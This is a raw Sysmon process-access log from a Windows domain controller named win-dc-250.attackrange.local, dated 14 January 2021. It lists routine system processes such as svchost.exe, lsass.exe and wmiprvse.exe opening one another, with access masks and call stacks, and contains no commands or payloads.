13:11:45.876{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:45.876{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:45.876{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:45.782{08A6967A-4288-6000-1400-000000009A01}12761424C:\Windows\System32\svchost.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+4609|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:45.767{08A6967A-4288-6000-1400-000000009A01}12761424C:\Windows\System32\svchost.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:45.751{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:45.751{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:45.751{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.972{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.972{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.972{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.925{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.925{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.925{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.910{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.910{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.910{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.894{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.894{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.863{08A6967A-4288-6000-1000-000000009A01}11364456C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.847{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.816{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.816{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.816{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.816{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 